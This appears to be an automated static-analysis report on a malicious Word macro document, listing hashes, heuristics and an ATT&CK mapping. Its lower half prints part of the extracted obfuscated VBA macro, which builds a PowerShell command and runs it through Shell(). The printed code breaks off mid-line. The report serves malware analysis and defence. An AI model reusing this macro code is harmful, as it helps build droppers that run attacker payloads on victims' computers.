Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 165342352beed895…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 156.0 KB
Created: 2018-05-20 21:45:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 58170d63094a91f3b8ff8d5812f9050f
SHA-1: 9dffb6e197829bffe7d7447fa344f63fad49e5d8
SHA-256: 165342352beed89530e07fab934f28102731a4139ce15e63a39f7b2521723a76
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The critical heuristic firing for a Shell() call within the VBA, combined with the script's attempt to construct and execute a PowerShell command, strongly suggests a downloader or initial execution payload. The obfuscated nature of the script prevents a more precise determination of its ultimate goal.

Heuristics (5)

  • VBA macros detected (severity: medium; 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   189234 bytes
SHA-256: f2c8649f950a54309d809be43b0001618e22b6fd51802a07a76314f08ca928f8
Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "HPfiIqCZCzE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BiaZiUSTfbG()

On Error Resume Next
TjaXAFJScCO = (buuTYhNRjGq - CDbl(275438) + WAsTihMYIK + Fix(YriNONHvG / CLng(387668 * Sqr(JzmTWNYuBMN))) - 425551 / Sin(kBzNpnvqqp - KWbpUwE - 498046 + CLng(KkuMDFAH)) * 474213 * Fix(275438))
bvFFFjiwVi = "UbCpiVBE7Dyowershell  (('Oa0zAJX7QkjtuVmYxSCkK8(HiogLC"
jtlZtRvtR = CStr(Left(Right(bvFFFjiwVi, 43), 14)) + CStr(Left(Right(bvFFFjiwVi, 7), 1)) + Left(Right(bvFFFjiwVi, 46), 2) + CStr(Left(Right(bvFFFjiwVi, 47), 1))

kjhIBGlRo = "7hQaLnsaYcEBvogd7gTCtIT1L4F'UDICk"
TvqRNIRwZvL = CStr(Left(Right(kjhIBGlRo, 31), 6)) + Left(Right(kjhIBGlRo, 18), 2) + CStr(Left(Right(kjhIBGlRo, 4), 1)) + CStr(Left(Right(kjhIBGlRo, 23), 1)) + Left(Right(kjhIBGlRo, 6), 1)

UHJaFoOmoju = Chr(43)
Sstvzw = "'Y8"
tfTwRkWtkz = CStr(Left(Right(Sstvzw, 3), 1))
KkBEYioVj = (ZSNWFVGcuL - CDbl(560944) + rYGOHG + Fix(jwZQNFnRmP / CLng(889142 * Sqr(MNDQV))) - 43562 / Sin(FYBYuL - LURSLupQb - 481550 + CLng(phQIE)) * 948300 * Fix(560944))
nnnmBYck = Chr(43)
sKQStT = "vgN7DEasd = grR7TCtIT1&(FUUDICkw1EpLPUSDPCzKBQrG"
kEUjSX = CStr(Left(Right(sKQStT, 45), 9)) + CStr(Left(Right(sKQStT, 26), 2)) + CStr(Left(Right(sKQStT, 6), 1)) + Left(Right(sKQStT, 34), 2) + CStr(Left(Right(sKQStT, 9), 1)) + CStr(Left(Right(sKQStT, 15), 1))

jEQEwnUco = Chr(43)
amkCmL = "Q7DE7nNE7OY7mBvogr0gTDtI"
VtdZjKkd = Left(Right(amkCmL, 23), 5) + Left(Right(amkCmL, 13), 1) + Left(Right(amkCmL, 3), 1) + Left(Right(amkCmL, 17), 1)
bzSKzaCjHh = (tjFPN - CDbl(274567) + RkmGDKt + Fix(ztQCdCHwv / CLng(382293 * Sqr(DqEQt))) - 574199 / Sin(OmvXBFap - iFoZiYpZ - 960787 + CLng(wjljdfwu)) * 888394 * Fix(274567))
jiRwnnzTVL = Chr(43)
HYDfIpw = "Q7DEzgEu77YcmBvogrDgT"
EQrXNEEk = Left(Right(HYDfIpw, 20), 4) + CStr(Left(Right(HYDfIpw, 12), 1)) + Left(Right(HYDfIpw, 3), 1) + Left(Right(HYDfIpw, 15), 1)

SpjspYksT = Chr(43)
jmNLnjCl = "7DEKQq'hvgNu"
OwjCv = Left(Right(jmNLnjCl, 12), 3) + Left(Right(jmNLnjCl, 6), 1)
tuYGPDGA = (zcVNwC - CDbl(714926) + sTwMZ + Fix(BdndXMVS / CLng(768947 * Sqr(JhfCak))) - 368832 / Sin(WkNsA - nhhQdtvmq - 865153 + CLng(wTtvTljtiv)) * 301862 * Fix(714926))
UqziScWEov = Chr(43)
UTRooJzKiDC = "H'R77hvDNu7OYEm"
MBYcK = Left(Right(UTRooJzKiDC, 14), 3) + CStr(Left(Right(UTRooJzKiDC, 8), 1)) + CStr(Left(Right(UTRooJzKiDC, 2), 1))

GTrOQ = Chr(43)
ZXobs = "7DEKQq7hvgNu"
wUCqiPVoKFI = Left(Right(ZXobs, 12), 3) + Left(Right(ZXobs, 6), 1)

PwcItovkKj = Chr(43)
COPvK = "7hzR7ezODcmBRogr0gTCtIE7L4F"
rQwmDjqBYE = Left(Right(COPvK, 25), 5) + Left(Right(COPvK, 15), 1) + Left(Right(COPvK, 4), 1) + Left(Right(COPvK, 19), 1) + Left(Right(COPvK, 5), 1)
BiaZiUSTfbG = jtlZtRvtR + TvqRNIRwZvL + UHJaFoOmoju + tfTwRkWtkz + nnnmBYck + kEUjSX + jEQEwnUco + VtdZjKkd + jiRwnnzTVL + EQrXNEEk + SpjspYksT + OwjCv + UqziScWEov + MBYcK + GTrOQ + wUCqiPVoKFI + PwcItovkKj + rQwmDjqBYE

End Function

Function wKPmnoSGpG()

On Error Resume Next
knYzS = (HAHRDujzklY - CDbl(574423) + iRzFYCjj + Fix(MELBw / CLng(953564 * Sqr(CHtoQLE))) - 492814 / Sin(DLNkUtM - zErZCGiOWN - 70674 + CLng(ovvvQFYjrq)) * 364235 * Fix(574423))
dTAXnczPjmR = Chr(43)
znDiRMSwC = "7DEKQq7hvgNu"
uoKlnvYDszm = Left(Right(znDiRMSwC, 12), 3) + Left(Right(znDiRMSwC, 6), 1)

QuAcmEDsbmw = Chr(43)
PVKiRzUIf = "HzR77hvDNu7OYEm"
HRiCa = Left(Right(PVKiRzUIf, 14), 3) + CStr(Left(Right(PVKiRzUIf, 8), 1)) + CStr(Left(Right(PVKiRzUIf, 2), 1))

RvLjJB = Chr(43)
zIJhYqFEVd = "Q7DE7gEu77YcmBvogrDgT"
jwVbJCjhAG = Left(Right(zIJhYqFEVd, 20), 4) + CStr(Left(Right(zIJhYqFEVd, 12), 1)) + Left(Right(zIJhYqFEVd, 3), 1) + Left(Right(zIJhYqFEVd, 15), 1)

cVdfiZRHqEi = Chr(43)
zXbVlOpaV = "vgN7DEw-objog70gTCtec1L4FUUDECkw1DpLPzS2PC"
RWchfrn = CStr(Left(Right(zXbVlOpaV, 39), 8)) + Left(Right(zXbVlOpaV, 23), 2) + Left(Right(zXbVlOpaV, 5), 1) + Left(Right(zXbVlOpaV, 29), 1) + CStr(
... (truncated)